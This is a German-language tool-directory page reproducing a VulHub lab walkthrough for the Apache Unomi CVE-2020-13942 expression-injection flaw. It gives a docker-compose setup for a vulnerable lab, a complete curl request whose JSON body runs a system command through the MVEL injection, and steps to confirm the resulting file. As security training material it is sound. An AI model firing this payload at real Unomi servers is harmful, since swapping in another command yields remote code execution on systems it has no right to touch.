Skip to content
KitploitKITPLOIT
ToolsBlog
Log in
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2020-13942byVulHub — Schritt-für-Schritt-Laborumgebung und Exploit für Apache Unomi CVE-2020-13942, die MVEL expression language injection demonstriert und zu Remote-Code-Ausführung führt. | Kitploit
Tools/GitHubGitHub/corsisechero/cve-2020-13942byvulhub
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & BildungLabs & Praxis
GitHubcorsisechero/cve-2020-13942byvulhub

CVE-2020-13942byVulHub

Schritt-für-Schritt-Laborumgebung und Exploit für Apache Unomi CVE-2020-13942, die MVEL expression language injection demonstriert und zu Remote-Code-Ausführung führt.

Repository anzeigen
7vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2020-13942byVulHub


Apache Unomi Expression Language Injection RCE (CVE-2020-13942)

Beschreibung

Diese Schwachstelle ermöglicht die Ausführung beliebiger Befehle auf Systemen, die Apache Unomi Version 1.5.1 ausführen, indem sie die MVEL-Ausdrückssprachen-Injection ausnutzt.

Projektseite

GitHub - Vulhub - Unomi CVE-2020-13942


Umgebungskonfiguration

Docker Compose-Datei (docker-compose.yml)

version: '2'
services:
  web:
    image: vulhub/unomi:1.5.1
    ports:
      - "9443:9443"
      - "8181:8181"
    environment:
      - UNOMI_ELASTICSEARCH_ADDRESSES=elasticsearch:9200
    depends_on:
      - elasticsearch
  elasticsearch:
    image: elasticsearch:7.9.3
    environment:
      - cluster.name=contextElasticSearch
      - discovery.type=single-node
      - "ES_JAVA_OPTS=-Xms512m -Xmx512m"
      - bootstrap.memory_lock=true

Starten der Container

Führen Sie die Container mit dem folgenden Befehl aus:

docker compose up -d

Ausführen des Exploits

Von Kali auszuführender Befehl

Senden Sie die folgende POST-Anfrage mit curl:

curl -X POST http://localhost:8181/context.json \
     -H "Accept-Encoding: gzip, deflate" \
     -H "Accept: */*" \
     -H "Accept-Language: en" \
     -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36" \
     -H "Connection: close" \
     -H "Content-Type: application/json" \
     -d '{
    "filters": [
        {
            "id": "sample",
            "filters": [
                {
                    "condition": {
                         "parameterValues": {
                            "": "script::Runtime r = Runtime.getRuntime(); r.exec(\"touch /tmp/pluto\");"
                        },
                        "type": "profilePropertyCondition"
                    }
                }
            ]
        }
    ],
    "sessionId": "sample"
}'

Überprüfung des Exploits

Zugriff auf den Container

Greifen Sie auf den Container zu, um die Erstellung der Datei zu überprüfen:

docker exec -it af7de05fc47e ls /tmp

Überprüfung des Ergebnisses

Überprüfen Sie das Vorhandensein des Ordners pluto:

hsperfdata_root  pluto

Wenn die Datei pluto vorhanden ist, bedeutet dies, dass der Exploit erfolgreich war.


Sicherheitshinweise

Diese Schwachstelle ermöglicht die Ausführung beliebiger Befehle. Verwenden Sie diese Tests nur in kontrollierten Umgebungen und zu Studien- oder Überprüfungszwecken. Das Ausnutzen von Schwachstellen in nicht autorisierten Umgebungen ist illegal.

Tool herunterladen